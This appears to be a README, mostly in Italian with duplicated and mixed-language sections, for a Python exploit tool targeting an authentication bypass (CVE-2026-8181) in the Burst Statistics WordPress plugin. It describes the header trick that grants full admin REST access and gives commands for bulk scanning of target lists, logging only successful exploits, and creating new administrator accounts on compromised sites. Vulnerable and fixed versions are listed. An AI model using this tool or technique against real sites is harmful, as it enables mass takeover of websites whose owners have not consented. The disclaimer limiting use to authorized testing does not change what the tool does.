
CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) bypass dell'autenticazione. Strumento Python — scansioni single e multi-target, worker thread, report TXT. Solo test autorizzati. Manutentore: mürrez.
**EN:** PoC controllato e brevi note tecniche per **test di sicurezza autorizzati** del bypass dell'autenticazione in **Burst Statistics**.
**TR:** PoC controllato e breve riassunto tecnico per test di sicurezza autorizzati del bypass dell'autenticazione nel plugin Burst Statistics.
Nota: Il numero di 200.000+ installazioni attive su WordPress.org rappresenta l'intera base utenti del plugin — non significa che ogni sito esegua una versione vulnerabile. L'impatto reale richiede la verifica di versione + ambiente (disponibilità di HTTP / password dell'applicazione, ecc.).
Nota: Il numero di 200.000+ installazioni attive su WordPress.org rappresenta l'intera base utenti del plugin; non significa che tutti i siti usino una versione vulnerabile. Per l'impatto reale vanno verificati versione + ambiente (HTTP, idoneità della password dell'applicazione, ecc.).
GitHub Flavored Markdown non incorpora GIF binarie senza un file nel repository. I frammenti Typing SVG qui sopra (CDN) simulano l'animazione. Per aggiungere una tua cattura dello schermo:

GitHub Markdown non supporta l'incorporamento di GIF senza un file nel repository. I Typing SVG qui sopra (CDN) forniscono un'animazione di testo. Per la tua demo:

flowchart LR
A[Client request] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Mis-handled branch| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: full admin context]
flowchart LR
A[İstek] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Yanlış dal| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: tam admin bağlamı]
Con -f, -o e --output-dir si escludono a vicenda.
In modalità -f, -o e --output-dir non possono essere usati insieme.
pip3 install requests urllib3
# Single site, report file
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k
# Single site + new admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k
# Bulk + combined file (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k
# Bulk + per-host files in folder (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k
# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k
# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: vuotoUn bypass riuscito non rivela la password reale dell'utente vittima — la password Basic nel PoC è finta. La riga Password: rimane vuota a meno che --create-user non abbia creato un account nuovo (in tal caso viene scritta la password generata).
Un bypass riuscito non divulga la password reale dell'utente esistente — la password Basic nel PoC è falsa. La riga Password: resta vuota finché --create-user non crea un account nuovo; in tal caso viene scritta la password generata.
Esclusivamente per valutazioni autorizzate per iscritto e per il tuo laboratorio. L'uso non autorizzato è illegale in molte giurisdizioni. Gli autori e il manutentore di questo README non si assumono alcuna responsabilità per un uso improprio.
Per valutazioni autorizzate per iscritto e il proprio laboratorio. L'uso non autorizzato è illegale in molti paesi. Gli autori e il curatore di questo README non sono responsabili dell'uso improprio.
| Campo | Dettaglio |
|---|
| Cosa | Bypass dell'autenticazione (CWE-287) in Burst Statistics: header appositamente costruiti possono elevare le richieste REST a pieno contesto amministratore. |
| Versioni | Vulnerabili: 3.4.0, 3.4.1, 3.4.1.1 · Usare: 3.4.2 o successiva |
| Gravità | CVSS ~9.8 (Critico); remoto, senza autenticazione nelle condizioni applicabili. |
| Questo repository | CVE-2026-8181.py — automazione da laboratorio: target singolo, elenco multiplo, thread pool, output TXT selettivo. |
| Campo | Dettaglio |
|---|
| Cosa | Bypass dell'autenticazione (CWE-287) in Burst Statistics. Con header personalizzati si ottiene il pieno contesto amministratore sulla richiesta REST. |
| Versioni | Vulnerabili: 3.4.0, 3.4.1, 3.4.1.1 · Consigliata: 3.4.2 o successiva |
| Gravità | CVSS ~9.8 (Critico); remoto e senza autenticazione in condizioni appropriate. |
| Questo repository | CVE-2026-8181.py — automazione da laboratorio: target singolo, scansione da elenco, thread pool, output TXT selettivo. |
| Funzionalità | Descrizione |
|---|
| Target singolo | -u URL di base |
| Target multipli | -f targets.txt (un URL per riga; commenti con #) |
| Concorrenza | -j N worker (limite massimo) |
| File combinato | -o file.txt — con -f vengono aggiunti solo gli exploit riusciti |
| File per host | --output-dir — solo gli exploit riusciti ricevono host.txt (i falliti vengono saltati) |
| Nuovo admin | --create-user — utente casuale via REST (la password compare poi nel report) |
| TLS (lab) | -k disabilita la verifica del certificato (solo lab attendibili) |
| Caratteristica | Descrizione |
|---|
| Target singolo | -u URL di base |
| Target multipli | -f targets.txt (un URL per riga; commento #) |
| Parallelismo | -j N worker (con limite massimo) |
| File singolo | -o dosya.txt — con -f viene aggiunto solo l'exploit riuscito |
| Output in cartella | --output-dir — solo gli exploit riusciti ottengono host.txt |
| Nuovo admin | --create-user — utente casuale tramite REST (la password nel report) |
| TLS (lab) | -k disabilita la verifica del certificato (solo lab affidabili) |